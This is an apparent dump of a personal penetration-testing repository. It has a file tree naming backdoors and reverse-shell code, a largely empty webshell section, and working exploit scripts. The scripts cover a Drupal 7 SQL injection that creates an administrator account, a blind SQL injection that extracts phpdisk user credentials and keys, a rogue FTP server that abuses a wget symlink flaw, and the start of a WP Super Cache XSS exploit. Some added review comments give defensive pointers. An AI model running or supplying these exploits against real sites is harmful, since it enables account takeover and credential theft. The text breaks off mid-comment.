├── README.md
├── backdoor
├── array_map.php
├── cmd.cfm
├── sql.cfm
└── uploader.php
├── exploit
├── drupal-7-x-sqli.py
├── phpdisk-sql-injection.py
├── wget-symlink_attack_exploit.py
└── wp-super-cache-xss-exploit.py
├── fuzzing
├── cutescan.py
├── dz.py
├── php-enable_functions-enumeration-script.php
└── rsync.py
├── misc
├── Reverse Shell.c
├── YMssql.cpp
├── burp_captcha_crack.py
├── gettitle.py
├── google.php
├── mssql-sql-inject-execute.py
├── php-ftp.php
├── proxy.asp
├── proxy.cfm
├── proxy.jsp
├── proxy.php
├── rsync.py
├── security-bulletins.list
├── ssltest.py
└── tasklist.vbs
├── note
├── audit-log.md
├── linux.txt
├── oracle.md
├── windows.txt
└── zgrab_1.md
└── project
├── device_mode_toggle
├── @devicemodetoggle-1.0.0.xpi
├── README.md
├── data
│ ├── icon-16.png
│ ├── icon-32.png
│ ├── icon-48.png
│ └── icon-64.png
├── index.js
├── package.json
└── test
│ └── test-index.js
├── diy_cloudplay
├── g.smali
├── readme.md
└── y2c.php
└── wgetex
├── WgetEx.Asm
├── WgetEx.exe
├── macros.asm
└── readme.txt
/README.md:
--------------------------------------------------------------------------------
1 | pentest
2 | =======
3 |
4 | some pentest scripts & tools by yaseng@uauc.net
5 |
6 |
7 |
8 | www.yaseng.me
9 | www.c0deplay.com
10 | team.f4ck.net
11 | www.90sec.org
12 |
13 | _____ _ _
14 | | _ | | | | |
15 | ___| |/' | __| | ___ _ __ | | __ _ _ _
16 | / __| /| |/ _` |/ _ \ '_ \| |/ _` | | | |
17 | | (__\ |_/ / (_| | __/ |_) | | (_| | |_| |
18 | \___|\___/ \__,_|\___| .__/|_|\__,_|\__, |
19 | | | __/ |
20 | |_| |___/
21 |
22 | ├─backdoor
23 | ├─exploit
24 | ├─fuzzing
25 | ├─lab
26 | └─misc
27 |
28 |
29 |
--------------------------------------------------------------------------------
/backdoor/array_map.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/backdoor/cmd.cfm:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
7 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 | #O#
27 |
28 |
29 |
30 |
31 |
--------------------------------------------------------------------------------
/backdoor/sql.cfm:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 | #preserveSingleQuotes(sql_cmds)#
10 |
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/backdoor/uploader.php:
--------------------------------------------------------------------------------
1 |
5 |
14 |
--------------------------------------------------------------------------------
/exploit/drupal-7-x-sqli.py:
--------------------------------------------------------------------------------
1 | #@name drupal-7-x-sqli.py
2 | #@author Yaseng
3 | #@desc Add a Drupal administrator account, compatibility table prefix such as test_users
4 | #@exp drupal-7-x-sqli.py http://127.0.0.1/cms/drupal/drupal/ testss 4343
5 | import urllib2,sys
6 |
def post(url,data,cookie=""):
    """Send ``data`` as an HTTP POST body to ``url`` and return the response body.

    A ``Cookie`` header carrying ``cookie`` is always attached (empty by
    default) and the request times out after 60 seconds.  When the server
    answers with an HTTP error status, the error is printed and the body of
    the error response is returned instead.
    """
    client = urllib2.build_opener()
    client.addheaders.append(('Cookie', cookie))
    try:
        response = client.open(url, data, timeout=60)
        return response.read()
    except urllib2.HTTPError as error:
        print(error)
        return error.read()
16 |
17 |
18 |
# Script entry point. Expects three positional arguments (target base URL,
# account name, numeric uid) and otherwise prints the usage line.
19 | if __name__ == '__main__':
20 | if len(sys.argv) > 3 :
21 | url=sys.argv[1]
22 | username=sys.argv[2]
23 | id=sys.argv[3]
# poc1/poc2 are the VALUES fragments for the two INSERT statements below;
# both are built by plain string formatting from the command-line arguments.
24 | poc1="values+(%s,'%s" % (id,username)
25 | poc2="values(%s,3)" % id
# The form body places SQL text inside the array key of the login form's
# `name[...]` field (form_id=user_login_block).  The stacked statements insert
# one row into {users} with a fixed password hash and one row into
# {users_roles} with rid 3 (presumably the administrator role, per the #@desc
# header -- confirm against the target schema).
# NOTE(review): for defenders, the visible indicators are a POST to the login
# form whose `name[` parameter key contains spaces, semicolons or SQL keywords,
# and unexpected rows in the users / users_roles tables.  The durable fix is
# the vendor's core security update for this login-form injection; request
# filtering is only a stop-gap.
26 | exploit="name[0%20;insert+into+{users}+(uid,name,pass,status)+"+poc1+"','$S$DrxHxKj6w11uEr04c1mBk.zeoEDoVgklllN2A3AOOJvooOfiqn9Y',1);insert+into+{users_roles}+(uid,rid)+"+poc2+";#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Login"
# The response body returned by post() is discarded, so the script itself
# gives no indication of whether the request had any effect.
27 | post(url,exploit)
28 |
29 | else:
30 | print "Usage drupal-7-x-sqli.py url username id \r\n "
31 |
--------------------------------------------------------------------------------
/exploit/phpdisk-sql-injection.py:
--------------------------------------------------------------------------------
1 | #===============================================================================
2 | # Id :phpdisk.y
3 | # Author:Yaseng
4 | #===============================================================================
5 | import sys, urllib2, time, os , Queue, msvcrt, threading,re,base64,md5,hashlib,binascii,cookielib
6 |
7 |
8 |
9 |
def cslogo():
    """Print the script's ASCII-art banner, name, author and usage line."""
    banner = '''
___ ___ ____ ____ ____ __ __ _ _
/ __)/ _ \( _ \( ___)( _ \( ) /__\ ( \/ )
( (__( (_) ))(_) ))__) )___/ )(__ /(__)\ \ /
\___)\___/(____/(____)(__) (____)(__)(__)(__)
Name:phpdisk bind sql injection exploit
Author:Yaseng [yaseng@uauc.net]
Usage:phpdisk.py site[www.yaseng.me] id[1]
'''
    print(banner)
20 |
21 | # show message
def msg(text, type=0):
    """Print ``text`` behind a status marker.

    ``type`` 0 selects ``[*]`` (information), 1 selects ``[+]`` (positive
    result) and every other value selects ``[-]``.
    """
    marker = "[*]" if type == 0 else ("[+]" if type == 1 else "[-]")
    print(marker + text)
30 |
31 |
32 |
33 | # get url data
def get_data(url):
    """Fetch ``url`` with a 10 second timeout and return the response body.

    Every failure (network error, HTTP error status, malformed URL, ...) is
    swallowed by the bare ``except`` and reported as the integer ``0``, so
    callers must be prepared for either a string or ``0``.
    """
    try:
        return urllib2.urlopen(url, timeout=10).read()
    except :
        return 0
# Boolean test used by the extraction loops: fetches `url` and returns 0 when
# the response text contains "ssport Err", otherwise 1.
# NOTE(review): get_data() returns the integer 0 on any failure and an integer
# has no .find(), so a failed request raises AttributeError here instead of
# producing a result.
40 | def b(url):
41 | if get_data(url).find("ssport Err",0) != -1 :
42 | return 0
43 | return 1
44 |
# Builds the request URL: the module-level `target` plus "?" plus the base64
# encoding of a query string with fixed username/password "1", action
# "passportlogin", the caller's text in `tpf`, and `sign` set to the upper-case
# MD5 hex digest of "passportlogin" + "1" + "1".
# NOTE(review): `sign` is computed from constants only, so (if the server
# checks it at all) it authenticates nothing.  Every caller passes text that
# starts with a table name followed by a WHERE clause, which suggests `tpf` is
# used as a table prefix in server-side SQL -- the server-side fix would be to
# validate that value against an allow-list before it reaches a query.
45 | def make_plyload(payload):
46 | return target+"?"+base64.b64encode("username=1&password=1&action=passportlogin&tpf="+payload+"&sign="+md5.new("passportlogin"+"1"+"1").hexdigest().upper())
47 |
# Recovers the `username` column of the pd_users row whose userid equals the
# module-level `uid`, using only the yes/no answer of b().  First the length
# is probed (0..39), then each position is compared against digits and
# lower-case letters.  Returns the recovered string.
# NOTE(review): this costs one HTTP request per candidate, so in server logs it
# appears as a burst of near-identical requests to the same script that differ
# only in the base64 query string -- a pattern rate limiting and log alerting
# can catch.
48 | def get_username():
49 |
50 | msg("get username ...")
# `pass_list` is declared global here but not assigned in this function.
51 | global pass_list
# `len` shadows the builtin for the rest of this function; it stays 0 when no
# length matches, in which case the loop below does nothing.
52 | len=0
53 | for i in range(40) :
54 | if b(make_plyload("pd_users WHERE 1 and (SELECT LENGTH(username) from pd_users where userid=%d )= %d #" % (uid,i))):
55 | len=i
56 | msg("username length:%d" % len,1)
57 | break
58 | global key_list
59 | key_list=['0','1','2','3','4','5','6','7','8','9']
60 | key_list+=map(chr,range(97,123))
61 | username=""
62 | for i in range(len) :
63 | for key in key_list :
64 | t=key
# Every entry of key_list is a str, so this branch is always taken and the
# candidate is sent as a hex literal rather than a quoted string.
65 | if type(key) != int :
66 | t="0x"+binascii.hexlify(key)
67 | if(b(make_plyload(" pd_users WHERE 1 and (SELECT substr(username,%d,1) from pd_users where userid=%d )=%s #" % (i+1,uid,t)))) :
68 | msg("username [%d]:%s" % (i+1,key))
69 | username+=key
70 | break
71 | msg("username:"+username,1)
72 | return username
73 |
74 |
75 |
# Recovers 32 characters of the `password` column for the module-level `uid`,
# one position at a time, testing each of the 16 lower-case hex digits through
# b().  Returns the recovered string (shorter than 32 when a position matched
# no candidate).
# NOTE(review): a 32-character hex value looks like an MD5 digest -- confirm
# against the application's schema.  If so, the stored credential is an
# unsalted fast hash, which is the weakness a defender should fix regardless
# of the injection itself.
76 | def get_password():
77 |
78 |
79 | pass_list=['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f']
80 | password=""
81 | for i in range(32) :
82 | for key in pass_list :
83 | t=key
84 | if type(key) != int :
85 | t="0x"+binascii.hexlify(key)
86 | if(b(make_plyload(" pd_users WHERE 1 and (SELECT substr(password,%d,1) from pd_users where userid=%d )= %s #" % (i+1,uid,t)))) :
87 | msg("password [%d]:%s" % (i+1,key))
88 | password+=key
89 | break
# The label printed here says "username:" although the value is the password.
90 | msg("username:"+password,1)
91 | return password
92 |
# Recovers the `value` column of the pd_settings row whose `vars` equals
# 0x656e63727970745f6b6579 (the hex encoding of the ASCII text "encrypt_key"),
# using the same length-then-character probing as get_username().  The
# character comparison uses binary() and a candidate set of digits plus upper-
# and lower-case letters, so it is case-sensitive.  Returns the recovered text.
# The entry-point block shown in this file does not call this function.
93 | def get_encrypt_key():
94 |
95 | msg("get encrypt_key ...")
96 | global pass_list
97 | pass_list=map(chr,range(97,123))
# `len` shadows the builtin from here to the end of the function.
98 | len=0
99 | for i in range(40) :
100 | if b(make_plyload("pd_users WHERE 1 and ( SELECT LENGTH(value) from pd_settings where vars=0x656e63727970745f6b6579 )=%d #23" % i)):
101 | len=i
102 | msg("encrypt_key length:%d" % len,1)
103 | break
104 | global key_list
105 | key_list=['0','1','2','3','4','5','6','7','8','9']
106 | key_list+=map(chr,range(65,91)+range(97,123))
107 | encrypt_key=""
108 | for i in range(len) :
109 | for key in key_list :
110 | t=key
111 | if type(key) != int :
112 | t="0x"+binascii.hexlify(key)
113 | if(b(make_plyload(" pd_users WHERE 1 and ( SELECT binary(substr(value,%d,1)) from pd_settings where vars=0x656e63727970745f6b6579 ) = %s #" % (i+1,t)))) :
114 | msg("key [%d]:%s" % (i+1,key))
115 | encrypt_key+=key
116 | break
117 | msg("encrypt_key:"+encrypt_key,1)
118 | return encrypt_key
119 |
120 |
121 |
# Script entry point: prints the banner, reads the site (argument 1) and the
# user id (argument 2, falling back to 1 when missing or not an integer), sets
# the module-level `target` to the passport.php script of the phpdisk_client
# plugin, and runs the username and password recovery in turn.
# NOTE(review): the indentation of this listing was lost, so which `if` the
# final `else` belongs to cannot be determined from here.
122 | if __name__ == '__main__':
123 |
124 | cslogo()
125 | if len(sys.argv) > 1 :
126 | site=sys.argv[1];
127 | global target
128 | global uid
129 | try :
130 | uid=int(sys.argv[2]);
131 | except :
132 | uid =1
# The only server-side resource touched is this one plugin script, which is
# where a defender should look for the request burst and where input handling
# needs fixing.
133 | target=site+"/plugins/phpdisk_client/passport.php"
134 | msg("exploit:"+site)
135 | #print get_data(make_plyload(" pd_users WHERE 1 and ( SELECT substr(value,2,1) from pd_settings where vars=0x656e63727970745f6b6579 ) = 9 %23"))
# get_data() returns 0 on any failure, so this doubles as a reachability check.
136 | if get_data(target) :
137 | username=get_username()
138 | if len(username) > 0 :
139 | password=get_password()
140 | if len(password) == 32 :
141 | msg("Succeed: username:%s password:%s" % (username,password),1)
142 | else :
143 | msg("vulnerability not exits",2);
144 | exit();
145 |
146 |
147 |
148 |
149 |
150 |
--------------------------------------------------------------------------------
/exploit/wget-symlink_attack_exploit.py:
--------------------------------------------------------------------------------
1 | #@name wget-symlink_attack_exploit.py
2 | #@author Yaseng
3 | #@desc server:python wget-symlink_attack_exploit.py wget client: wget -m ftp://127.0.0.1
4 | import socket, threading, os, sys, time
5 | import hashlib, platform, stat
6 |
# Address and port the control listener binds to (used by server_listen and,
# for passive data sockets, by FtpConnection.process).  Port 21 is below 1024,
# which on Unix-like systems normally requires elevated privileges to bind.
7 | listen_ip = "127.0.0.1"
8 | listen_port = 21
# FtpConnection threads currently tracked; rebuilt by server_listen().
9 | conn_list = []
# Base directory, relative to the working directory, under which per-user
# home directories are resolved.
10 | root_dir = "./home"
# FtpConnection.run() refuses a connection when conn_list is longer than this.
11 | max_connections = 500
# Seconds without activity after which server_listen() shuts a connection down.
12 | conn_timeout = 120
13 |
14 |
# One thread per accepted FTP control connection.  The class is a small FTP
# server implementation in which two replies do not come from the file system:
# the LIST/NLST handler returns a hard-coded directory listing and the RETR
# handler always returns the local file "1.txt".
# NOTE(review): for defenders the point of interest is the client side.  A
# recursive FTP client that recreates server-supplied symbolic links locally
# and then descends into a same-named directory can be made to write outside
# its download directory.  Running a patched client, or making the client
# fetch link targets instead of creating links (wget's --retr-symlinks
# option), removes that exposure.
15 | class FtpConnection(threading.Thread):
# Stores the accepted control socket and the initial session state
# (not identified, passive mode on, UTF-8 off, empty username).
16 | def __init__(self, fd):
17 | threading.Thread.__init__(self)
18 | self.fd = fd
19 | self.running = True
20 | self.setDaemon(True)
21 | self.alive_time = time.time()
22 | self.option_utf8 = False
23 | self.identified = False
24 | self.option_pasv = True
25 | self.username = ""
# Dispatches one FTP command.  `cmd` is upper-cased; `arg` is the text after
# the first space (empty string when absent).  Replies are sent through
# self.message(); the method returns nothing.
26 | def process(self, cmd, arg):
27 | cmd = cmd.upper();
28 | if self.option_utf8:
29 | arg = unicode(arg, "utf8").encode(sys.getfilesystemencoding())
30 | print "<<", cmd, arg, self.fd
31 | # Ftp Command
32 | if cmd == "BYE" or cmd == "QUIT":
33 | if os.path.exists(root_dir + "/xxftp.goodbye"):
34 | self.message(221, open(root_dir + "/xxftp.goodbye").read())
35 | else:
36 | self.message(221, "Bye!")
37 | self.running = False
38 | return
39 | elif cmd == "USER":
40 | # Set Anonymous User
41 | if arg == "": arg = "anonymous"
# Only letters, digits and "_" are accepted, which keeps path separators and
# dots out of the home directory name built below.
42 | for c in arg:
43 | if not c.isalpha() and not c.isdigit() and c != "_":
44 | self.message(530, "Incorrect username.")
45 | return
46 | self.username = arg
47 | self.home_dir = root_dir + "/" + self.username
48 | self.curr_dir = "/"
49 | self.curr_dir, self.full_path, permission, self.vdir_list, \
50 | limit_size, is_virtual = self.parse_path("/")
51 |
# The session is marked identified as soon as USER is accepted; no password
# is required for any username.
52 | self.identified = True
53 | self.message(230, "Identified!")
54 | return
55 | elif cmd == "PASS":
# NOTE(review): self.pass_path is not assigned anywhere in this class as
# shown, so this branch would raise AttributeError.  The comparison is
# against an MD5 hex digest of the supplied password.
56 | if open(self.pass_path).read() == hashlib.md5(arg).hexdigest():
57 | self.message(230, "Identified!")
58 | self.identified = True
59 | else:
60 | self.message(530, "Not identified!")
61 | self.identified = False
62 | return
63 | elif not self.identified:
64 | self.message(530, "Please login with USER and PASS.")
65 | return
66 |
# Everything below requires an identified session.  `finish` records whether
# the command was fully handled in this first group (no path argument needed).
67 | self.alive_time = time.time()
68 | finish = True
69 | if cmd == "NOOP":
70 | self.message(200, "ok")
71 | elif cmd == "TYPE":
72 | self.message(200, "ok")
73 | elif cmd == "SYST":
74 | self.message(200, "UNIX")
75 | elif cmd == "EPSV" or cmd == "PASV":
76 | self.option_pasv = True
77 | try:
# Passive mode: listen on an OS-chosen port on listen_ip and tell the client
# where to connect.
78 | self.data_fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
79 | self.data_fd.bind((listen_ip, 0))
80 | self.data_fd.listen(1)
81 | ip, port = self.data_fd.getsockname()
82 | if cmd == "EPSV":
83 | self.message(229, "Entering Extended Passive Mode (|||" + str(port) + "|)")
84 | else:
85 | ipnum = socket.inet_aton(ip)
86 | self.message(227, "Entering Passive Mode (%s,%u,%u)." %
87 | (",".join(ip.split(".")), (port >> 8 & 0xff), (port & 0xff)))
88 | except:
89 | self.message(500, "failed to create data socket.")
90 | elif cmd == "EPRT":
91 | self.message(500, "implement EPRT later...")
92 | elif cmd == "PORT":
# Active mode: the data-connection address is taken from the client's
# argument as-is; nothing here checks that it is the control connection's
# peer address.
93 | self.option_pasv = False
94 | self.data_fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
95 | s = arg.split(",")
96 | self.data_ip = ".".join(s[:4])
97 | self.data_port = int(s[4]) * 256 + int(s[5])
98 | self.message(200, "ok")
99 | elif cmd == "PWD" or cmd == "XPWD":
100 | if self.curr_dir == "": self.curr_dir = "/"
101 | self.message(257, '"' + self.curr_dir + '"')
102 | elif cmd == "LIST" or cmd == "NLST":
103 | if arg != "" and arg[0] == "-": arg = ""
# The listing is hard-coded, not read from disk.  When the current directory
# contains "aked" past its first character the reply is one regular file
# named "pwned"; otherwise it is two entries with the same name "fakedir",
# one a symbolic link to /tmp and one a directory.
104 | if self.curr_dir.find("aked") > 0 :
105 | buf="-rwx------ 1 root root 21 Aug 29 2013 pwned\r\n"
106 | else:
107 | buf = "lrwxrwxrwx 1 root root 33 Oct 11 2013 fakedir -> /tmp\r\n"
108 | buf += "drwxrwxr-x 15 root root 4096 Oct 11 2013 fakedir\r\n"
109 | poc = "total \r\n" + buf
110 | poc = unicode(poc, sys.getfilesystemencoding()).encode("utf8")
111 | self.message(150, "Opening ASCII mode data connection for /bin/ls\r\n")
# The return value of establish() is not checked here (the STOR handler
# further down does check it).
112 | self.establish()
113 | self.data_fd.send(poc)
114 |
115 | # self.data_fd.send("xx")
116 | self.message(226, " Transfer complete.\r\n")
117 | self.data_fd.close()
118 | self.data_fd = 0
119 |
120 |
121 | elif cmd == "REST":
122 | self.file_pos = int(arg)
123 | self.message(250, "ok")
124 | elif cmd == "FEAT":
125 | features = "211-Features:\r\nSITES\r\nEPRT\r\nEPSV\r\nMDTM\r\nPASV\r\n"\
126 | "REST STREAM\r\nSIZE\r\nUTF8\r\n211 End\r\n"
127 | self.fd.send(features)
128 | elif cmd == "OPTS":
129 | arg = arg.upper()
130 | if arg == "UTF8 ON":
131 | self.option_utf8 = True
132 | self.message(200, "ok")
133 | elif arg == "UTF8 OFF":
134 | self.option_utf8 = False
135 | self.message(200, "ok")
136 | else:
137 | self.message(500, "unrecognized option")
138 | elif cmd == "CDUP":
139 | finish = False
140 | arg = ".."
141 | else:
142 | finish = False
143 | if finish: return
# Remaining commands operate on a path: resolve it, derive the permission
# flags, then dispatch.
144 | # Parse argument ( It's a path )
145 | if arg == "":
146 | self.message(500, "where's my argument?")
147 | return
148 | remote, local, permission, vdir_list, limit_size, is_virtual = \
149 | self.parse_path(arg)
150 | # can not do anything to virtual directory
151 | if is_virtual: permission = "none"
152 | can_read, can_write, can_modify = "read" in permission, "write" in permission, "modify" in permission
153 | newpath = local
154 | try:
155 | if cmd == "CWD":
# `if 1:` makes the change of directory always succeed; the target is not
# checked for existence, so the failure branch is unreachable.
156 | if 1:
157 | self.curr_dir = remote
158 | self.full_path = newpath
159 | self.message(250, '"' + remote + '"')
160 | else:
161 | self.message(550, "failed")
162 | elif cmd == "MDTM":
163 | if os.path.exists(newpath):
164 | self.message(213, time.strftime("%Y%m%d%I%M%S", time.localtime(
165 | os.path.getmtime(newpath))))
166 | else:
167 | self.message(550, "failed")
168 | elif cmd == "SIZE":
169 | self.message(231, os.path.getsize(newpath))
170 | elif cmd == "XMKD" or cmd == "MKD":
171 | if not can_modify:
172 | self.message(550, "permission denied.")
173 | return
174 | os.mkdir(newpath)
175 | self.message(250, "ok")
176 | elif cmd == "RNFR":
177 | if not can_modify:
178 | self.message(550, "permission denied.")
179 | return
180 | self.temp_path = newpath
181 | self.message(350, "rename from " + remote)
182 | elif cmd == "RNTO":
# NOTE(review): unlike RNFR, this branch has no can_modify check on the
# destination, and self.temp_path is only set by a preceding RNFR.
183 | os.rename(self.temp_path, newpath)
184 | self.message(250, "RNTO to " + remote)
185 | elif cmd == "XRMD" or cmd == "RMD":
186 | if not can_modify:
187 | self.message(550, "permission denied.")
188 | return
189 | os.rmdir(newpath)
190 | self.message(250, "ok")
191 | elif cmd == "DELE":
192 | if not can_modify:
193 | self.message(550, "permission denied.")
194 | return
195 | os.remove(newpath)
196 | self.message(250, "ok")
197 | elif cmd == "RETR":
# The requested path is ignored: every download returns at most the first
# 8192 bytes of "1.txt" from the server's working directory, and can_read is
# not consulted.
198 | self.establish()
199 | #data="hello"
200 | self.message(150, "ok")
201 | f = open("1.txt", "rb")
202 | data = f.read(8192)
203 | f.close()
204 | self.data_fd.send(data)
205 | self.data_fd.close()
206 | self.data_fd = 0
207 | self.message(226, "ok")
208 | elif cmd == "STOR" or cmd == "APPE":
209 | if not can_write:
210 | self.message(550, "permission denied.")
211 | return
212 | if os.path.exists(newpath) and not can_modify:
213 | self.message(550, "permission denied.")
214 | return
215 | # Check space size remained!
216 | used_size = 0
217 | if limit_size > 0:
218 | used_size = self.get_dir_size(os.path.dirname(newpath))
219 | if not self.establish(): return
220 | self.message(150, "ok")
221 | f = open(newpath, ("ab" if cmd == "APPE" else "wb"))
222 | while self.running:
223 | self.alive_time = time.time()
224 | data = self.data_fd.recv(8192)
225 | if len(data) == 0: break
226 | if limit_size > 0:
227 | used_size = used_size + len(data)
228 | if used_size > limit_size: break
229 | f.write(data)
230 | f.close()
231 | self.data_fd.close()
232 | self.data_fd = 0
233 | if limit_size > 0 and used_size > limit_size:
234 | self.message(550, "Exceeding user space limit: " + str(limit_size) + " bytes")
235 | else:
236 | self.message(226, "ok")
237 | else:
238 | self.message(500, cmd + " not implemented")
# Any exception raised by a path command is reduced to a generic 550 reply;
# the cause is not logged.
239 | except:
240 | self.message(550, "failed.")
241 |
# Opens the data connection prepared by PASV/EPSV (accept) or PORT (connect).
# Returns True on success, False after sending a 500 reply.
242 | def establish(self):
243 | if self.data_fd == 0:
244 | self.message(500, "no data connection")
245 | return False
246 | if self.option_pasv:
247 | fd = self.data_fd.accept()[0]
248 | self.data_fd.close()
249 | self.data_fd = fd
250 | else:
251 | try:
252 | self.data_fd.connect((self.data_ip, self.data_port))
253 | except:
254 | self.message(500, "failed to establish data connection")
255 | return False
256 | return True
257 |
# Reads "<path>/.xxftp/virtual" when it exists and returns one list of
# whitespace-separated fields per line, with "$root" in the second field
# replaced by root_dir.  parse_path() reads fields 0, 1 and 2 as name, local
# path and permission.  Returns [] when the file is absent.
258 | def read_virtual(self, path):
259 | vdir_list = []
260 | path = path + "/.xxftp/virtual"
261 | if os.path.isfile(path):
# The file object is never closed explicitly.
262 | for v in open(path, "r").readlines():
263 | items = v.split()
264 | items[1] = items[1].replace("$root", root_dir)
265 | vdir_list.append(items)
266 | return vdir_list
267 |
# Returns the total size in bytes of all files below `folder`.
268 | def get_dir_size(self, folder):
269 | size = 0
270 | for path, dirs, files in os.walk(folder):
271 | for f in files:
272 | size += os.path.getsize(os.path.join(path, f))
273 | return size
274 |
# Returns the integer on the first line of "<path>/.xxftp/size", or 0 when
# that file does not exist.  STOR/APPE treat a value above 0 as a byte quota.
275 | def read_size(self, path):
276 | size = 0
277 | path = path + "/.xxftp/size"
278 | if os.path.isfile(path):
279 | size = int(open(path, "r").readline())
280 | return size
281 |
# Returns the first line of "<path>/.xxftp/permission" (trailing newline
# included), or "read,write,modify" when that file does not exist.
282 | def read_permission(self, path):
283 | permission = "read,write,modify"
284 | path = path + "/.xxftp/permission"
285 | if os.path.isfile(path):
286 | permission = open(path, "r").readline()
287 | return permission
288 |
# Resolves a client-supplied path (relative to self.curr_dir unless it starts
# with "/") to a tuple (remote, local, permission, vdir_list, limit_size,
# is_virtual), walking the components below self.home_dir and applying any
# virtual-directory mapping found on the way.
289 | def parse_path(self, path):
290 | if path == "": path = "."
291 | if path[0] != "/":
292 | path = self.curr_dir + "/" + path
293 | s = os.path.normpath(path).replace("\\", "/").split("/")
294 | local = self.home_dir
295 | # reset directory permission
296 | vdir_list = self.read_virtual(local)
297 | limit_size = self.read_size(local)
298 | permission = self.read_permission(local)
299 | remote = ""
300 | is_virtual = False
301 | for name in s:
# Leading dots are stripped from every component, so "." and ".." become
# empty and are skipped; only a virtual-directory entry can move `local`
# away from the home directory.
302 | name = name.lstrip(".")
303 | if name == "": continue
304 | remote = remote + "/" + name
305 | is_virtual = False
306 | for v in vdir_list:
307 | if v[0] == name:
308 | permission = v[2]
309 | local = v[1]
310 | limit_size = self.read_size(local)
311 | is_virtual = True
312 | if not is_virtual: local = local + "/" + name
313 | vdir_list = self.read_virtual(local)
314 | return (remote, local, permission, vdir_list, limit_size, is_virtual)
315 |
# Thread body: sends the 220 greeting, then reads from the control socket
# until the buffered text ends in CRLF, splits it at the first space into
# command and argument, and hands both to process().
316 | def run(self):
317 | ''' Connection Process '''
318 | try:
319 | if len(conn_list) > max_connections:
320 | self.message(500, "too many connections!")
321 | self.fd.close()
322 | self.running = False
323 | return
324 | self.message(220, "exploiting")
325 | # Command Loop
326 | line = ""
327 | while self.running:
328 | data = self.fd.recv(4096)
329 | if len(data) == 0: break
# No upper bound is placed on `line`, so a peer that never sends CRLF makes
# the buffer grow until the connection ends.
330 | line += data
331 | if line[-2:] != "\r\n": continue
332 | line = line[:-2]
333 | space = line.find(" ")
334 | if space == -1:
335 | self.process(line, "")
336 | else:
337 | self.process(line[:space], line[space + 1:])
338 | line = ""
339 | except:
340 | print "error", sys.exc_info()
341 | self.running = False
342 | self.fd.close()
343 | print "connection end", self.fd, "user", self.username
344 |
# Sends a reply on the control socket.  A multi-line text is sent as
# "<code>-<line>" for every line but the last and "<code> <line>" for the
# last one; carriage returns in `s` are removed first.
345 | def message(self, code, s):
346 | ''' Send Ftp Message '''
347 | s = str(s).replace("\r", "")
348 | ss = s.split("\n")
349 | if len(ss) > 1:
350 | r = (str(code) + "-") + ("\r\n" + str(code) + "-").join(ss[:-1])
351 | r += "\r\n" + str(code) + " " + ss[-1] + "\r\n"
352 | else:
353 | r = str(code) + " " + ss[0] + "\r\n"
354 | if self.option_utf8:
355 | r = unicode(r, sys.getfilesystemencoding()).encode("utf8")
356 | self.fd.send(r)
357 |
# Accept loop: binds the control listener to (listen_ip, listen_port), starts
# one FtpConnection thread per accepted socket, and after every accept shuts
# down connections idle for more than conn_timeout seconds and drops finished
# ones from conn_list.  The loop has no exit condition.
358 | def server_listen():
359 | global conn_list
# NOTE(review): `list_count` is declared global but the assignment on the
# next line targets a differently spelled local name, and neither is used
# elsewhere in this function.
360 | global list_count
361 | list_coun=1
362 | listen_fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
363 | listen_fd.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
364 | listen_fd.bind((listen_ip, listen_port))
365 | listen_fd.listen(1024)
# The lock is created and used only inside this function, so as shown it
# does not coordinate with the FtpConnection threads that read conn_list.
366 | conn_lock = threading.Lock()
367 | print "ftpd is listening on ", listen_ip + ":" + str(listen_port)
368 |
369 | while True:
370 | conn_fd, remote_addr = listen_fd.accept()
371 | print "connection from ", remote_addr, "conn_list", len(conn_list)
372 | conn = FtpConnection(conn_fd)
373 | conn.start()
374 |
375 | conn_lock.acquire()
376 | conn_list.append(conn)
377 | # check timeout
# Idle connections are only reaped when a new connection arrives.
378 | try:
379 | curr_time = time.time()
380 | for conn in conn_list:
381 | if int(curr_time - conn.alive_time) > conn_timeout:
382 | if conn.running == True:
383 | conn.fd.shutdown(socket.SHUT_RDWR)
384 | conn.running = False
385 | conn_list = [conn for conn in conn_list if conn.running]
386 | except:
387 | print sys.exc_info()
388 | conn_lock.release()
389 |
390 |
def main():
    """Program entry point: run the FTP accept loop of ``server_listen``."""
    server_listen()


# Start the listener only when the file is executed as a script, not on import.
if __name__ == "__main__":
    main()
396 |
--------------------------------------------------------------------------------
/exploit/wp-super-cache-xss-exploit.py:
--------------------------------------------------------------------------------
1 | #@name wp-super-cache-xss-exploit.py
2 | #@author Yaseng
3 | #@team Baidu X-Team
4 | #@link https://blog.sucuri.net/2015/04/security-advisory-persistent-xss-in-wp-super-cache.html
5 | #@exp wp-super-cache-xss-exploit.py http://127.0.0.1/cms/wordpress
6 |
7 |
8 | import urllib2,sys,time,hashlib
9 |
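def get(url,cookie=""):
    """Issue an HTTP GET for ``url`` and return the response body.

    The request carries ``cookie`` in a ``Cookie`` header, uses ``url`` itself
    as the ``Referer`` and times out after 60 seconds.  When the server
    answers with an HTTP error status, the body of the error response is
    printed and returned.
    """
    opener = urllib2.build_opener()
    opener.addheaders.append(('Cookie', cookie))
    opener.addheaders.append(('Referer', url))
    try:
        return opener.open(url, timeout=60).read()
    except urllib2.HTTPError as error:
        # Read the error body once: the response is a stream, so the second
        # read() in the previous version returned an empty string to the caller.
        body = error.read()
        print(body)
        return body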
20 |
21 |
# Script entry point: takes the site URL as the only argument and sends one
# GET request carrying a crafted cookie; without an argument it prints usage.
22 | if __name__ == '__main__':
23 | if len(sys.argv) > 1 :
# `poc` holds only a space in this listing; any markup it once contained is
# not visible here.
24 | poc=" "
25 | #a new administrator account to the site, injecting backdoors by using WordPress theme edition tools, etc.
26 | url=sys.argv[1]
# The cookie is named "comment_author_url_" + an MD5 hex digest of the
# current time, and its value is `poc` followed by the same digest.
# NOTE(review): per the advisory linked in the file header this concerns a
# persistent XSS in the WP Super Cache plugin.  Defenders should update the
